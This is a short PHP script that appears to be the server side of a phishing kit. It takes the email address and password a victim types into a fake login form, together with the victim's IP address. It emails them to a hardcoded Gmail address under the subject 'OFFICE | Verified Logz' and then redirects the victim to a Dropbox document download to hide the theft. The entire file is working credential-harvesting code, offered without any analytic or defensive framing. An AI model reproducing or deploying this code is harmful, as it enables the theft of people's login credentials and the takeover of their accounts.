<?

//$adddate=date("D M d, Y g:i a");
$ip = getenv("REMOTE_ADDR");
$message .= "---------=SHOP=---------\n";
$message .= "Email: ".$_POST['email']."\n";
$message .= "Password: ".$_POST['password']."\n";
$message .= "---------=IP Adress & Date=---------\n";
$message .= "IP Address: ".$ip."\n";
//$message .= "Date: ".$adddate."\n";
$message .= "---------=ORIGINAL=---------\n";




$sent ="allcareas@gmail.com";




$subject = "OFFICE | Verified Logz";
$headers = "From: ORIGINAL <toolz@daddamgo.lite>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
{
mail($mesaegs,$subject,$message,$headers);
mail($sent,$subject,$message,$headers);
}
header("Location: https://www.dropbox.com/s/qujwy57ei30hfkl/Wealthmanagementforbusinessowners.docx?dl=1");
?>